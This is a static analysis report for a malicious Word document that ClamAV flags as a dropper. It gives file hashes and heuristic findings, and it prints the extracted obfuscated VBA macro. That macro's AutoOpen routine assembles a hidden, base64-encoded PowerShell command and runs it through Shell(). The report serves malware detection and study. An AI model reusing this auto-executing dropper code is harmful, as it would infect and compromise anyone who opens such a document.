Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 90b59173f79d08bf…

MALICIOUS

Office (OLE)

Size: 87.0 KB
Created: 2018-05-30 11:03:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 4dbd38fd66f3dca5243c0a731b708e34
SHA-1: 88f8c73168647cd5a6d426d6baec99d584e4b6f5
SHA-256: 90b59173f79d08bfe9f98f704ff4f591bb776e43da7f76f39398ed04135c726f
Risk Score: 242

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6565427-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6565427-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14128 bytes
SHA-256: 26728390b9bb7ed2d86fbdbbea0920956999dd08f02401a8dd665c2c10c6c9d1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UWIbRtrdWfMu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BhECP()
On Error Resume Next
XwqPS = Fix(97430 / CSng(99464) * pwtlVG * GiijKL)
VhBn = CDate(82074)
zdFiiH = Fix(29418 / CSng(51547) * fwdpU * uwMnjE)
VhBn = CDate(27996)
BhECP = zzPIMqlwTV + KKSTchjPBdw + VFBkOjPmWsC + mKLLZavlsWj + uoRZb + PRXiVf + vVvvbii + KmhCMwm + VLuBz + zlRFZkdAj
hmPkYq = Fix(65702 / CSng(86776) * jEsmMU * ZZXVG)
VhBn = CDate(43323)
End Function
Sub Autoopen()
On Error Resume Next
Almkiw = Fix(46844 / CSng(19446) * jzYrPW * kqmHzk)
VhBn = CDate(53500)
pNTOsHzwn (BhECP)
iirNG = Fix(63556 / CSng(86915) * KJPwl * AuTWS)
VhBn = CDate(17939)
End Sub
Function pNTOsHzwn(uPRHKtnCtS)
On Error Resume Next
ncFCin = Fix(59825 / CSng(39286) * fPKdC * HKDFq)
VhBn = CDate(45850)
LGKvJm = dfTfMzoGwVC + Shell(ZkmfKPG + (Chr(vbKeyP)) + aXiqs + uPRHKtnCtS + kHmpWzdO, AwAJnWj + vbHide + FAaDYZazfD)
hAXFd = Fix(80950 / CSng(83352) * aSSTuC * KXtOFv)
VhBn = CDate(57578)
End Function
Attribute VB_Name = "oHEwnITMTRZuEi"
Function zzPIMqlwTV()
On Error Resume Next
pXbqY = Fix(31734 / CSng(12006) * QHiiCX * APdjw)
VhBn = CDate(94076)
VoHvjkjwsjn = "owersH" + "eLL -" + "WinDo" + "wsTyl" + "e hidden " + "-e SQBuAFYAb" + "wBrAGUA" + "LQBlAHgAcABSA" + "GUAUwBzAEkAbwB"
JzbQMK = Fix(1806 / CSng(84624) * btnrVb * RjinoJ)
VhBn = CDate(77808)
OCaWla = "OACgAKAAoAC" + "gAIgB7A" + "DEAMwB9AHsA" + "OAA0AH"
QKMAo = Fix(79158 / CSng(97019) * bwNbPI * vuYdH)
VhBn = CDate(70948)
PSwpAtci = "0AewAzADcAfQ" + "B7ADYAMAB9" + "AHsAO" + "QA3AH"
ffZoM = Fix(5214 / CSng(38531) * CzKMz * zADoc)
VhBn = CDate(7735)
dhwnOiGB = "0AewA" + "0ADYA" + "fQB7ADEANQB" + "9AHsAOQAwAH" + "0AewA5ADM" + "AfQB7A"
sHzLJ = Fix(55563 / CSng(67087) * QfjiCi * bzdvVS)
VhBn = CDate(92434)
IlXhQvB = "DEAMAB9" + "AHsAMQAxADEA" + "fQB7ADEANwB9AHs" + "AMgAwAH0AewAx"
RDICz = Fix(89521 / CSng(38878) * ijCnXa * CZlQlU)
VhBn = CDate(57522)
iQscmufFQwS = "ADEAfQB7ADkANgB" + "9AHsAMgA0AH0" + "AewAzADgAfQB7" + "ADEAMQA0AH0Ae"
zWRZDL = Fix(63451 / CSng(65882) * wtiIAa * wwqCzz)
VhBn = CDate(84332)
jEmHCTAjo = "wAzADMAfQB7ADEA" + "OAB9A" + "HsAOQAxAH0Ae" + "wA3ADYAfQB7ADM" + "AMgB9AHsANQA" + "xAH0AewA2A"
zzPIMqlwTV = VoHvjkjwsjn + OCaWla + PSwpAtci + dhwnOiGB + IlXhQvB + iQscmufFQwS + jEmHCTAjo
End Function
Function KKSTchjPBdw()
On Error Resume Next
BXaVk = Fix(4127 / CSng(19949) * nVLfjV * czwIq)
VhBn = CDate(57905)
nbwqkBoH = "DUAfQB7ADkAOQB9" + "AHsAMwAwAH0AewA" + "xADQAfQB7" + "ADIAOAB9AHsA"
UCzzSp = Fix(56385 / CSng(53542) * ziHYjl * zrmzv)
VhBn = CDate(75226)
IuCOvv = "NwAzAH" + "0AewAyADYAfQB7A" + "DYAOQB" + "9AHsANAAxA" + "H0AewA3ADQAfQ" + "B7ADcANwB" + "9AHsAMgA5AH0Aew" + "A2ADMA" + "fQB7ADM"
uEdjNE = Fix(98234 / CSng(83624) * iJCYW * kVQLlO)
VhBn = CDate(2047)
bcMcjRD = "ANAB9AH" + "sANAA" + "3AH0AewA" + "4ADIAfQB7AD" + "EAMAAyAH0Aew" + "A3ADgAfQB7ADU" + "AMAB9AHsAMQB9AH"
wjrmA = Fix(32023 / CSng(7483) * whNEuo * PXkFd)
VhBn = CDate(55850)
QzbiPsDsDt = "sANAAzAH0AewA1" + "ADkAfQB7" + "ADUANAB9AH" + "sAOQAyAH0AewAy" + "ADEAfQB7" + "ADcAf"
dNoMH = Fix(33369 / CSng(68220) * Batjjw * RwazA)
VhBn = CDate(25039)
SQYmNmhDo = "QB7AD" + "gAMAB9AHsAMQAw" + "ADYAfQB" + "7ADgAfQB7AD" + "gANQB9AHs" + "AMwAxAH0AewA4"
KRqvL = Fix(2271 / CSng(76380) * IXvhF * woImuM)
VhBn = CDate(60606)
LPUHS = "ADgAfQB7ADUAMg" + "B9AHsANQA3" + "AH0Ae" + "wA2AD" + "EAfQB7ADQAN"
KKSTchjPBdw = nbwqkBoH + IuCOvv + bcMcjRD + QzbiPsDsDt + SQYmNmhDo + LPUHS
End Function
Function VFBkOjPmWsC()
On Error Resume Next
LOIMsG = Fix(74397 / CSng(59515) * cBICXW * FiwAR)
VhBn = CDate(41592)
wtMKfpjT = "QB9AHsAMgAyAH0A" + "ewAzAH0Aew" + "AxADAAMwB" + "9AHsANQA4AH0Aew"
wrsTJR = Fix(21417 / CSng(11863) * qXGbm * IhOdsT)
VhBn = CDate(61241)
kiEdjlkvzz = "A2ADQAfQB7AD" + "QAOQB9AHsAMAB9A" + "HsAOQA1AH0A" + "ewA1ADYAfQB7AD" + "QANAB9AHsAMQAw" + "ADUAf
... (truncated)